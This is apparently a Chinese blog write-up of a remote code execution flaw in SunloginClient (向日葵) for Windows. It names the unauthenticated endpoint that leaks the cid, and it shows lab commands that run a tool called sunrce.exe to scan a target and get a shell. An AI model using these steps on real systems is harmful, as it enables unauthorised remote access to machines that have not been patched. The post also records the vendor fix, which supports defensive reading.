漏洞简介
向日葵个人版企业版均受影响 for Windows <=11.0.0.33
SunloginClient 启动后会在 40000 以上随机开放一个web端口,认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce
测试向日葵客户端漏洞版本:11.0.0.33826
复现过程
环境说明
攻击机:192.168.0.23(Window10)
目标机:192.168.0.24(windows2012)
测试向日葵客户端漏洞版本:11.0.0.33826
image.png
扫描受害机漏洞端口
sunrce.exe -h 192.168.0.24 -ps -shell
image.png
获取受害机shell
sunrce.exe -h 192.168.0.24 -ps 49341 -shell
image.png
漏洞修复
厂商已发布了漏洞修复程序,请及时关注更新
原创不易,转载请注明出处
原文链接:https://qu1u1.cn/archives/%E5%90%91%E6%97%A5%E8%91%B5%E8%BF%9C%E6%8E%A7%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%B7%A5%E5%85%B7
网友评论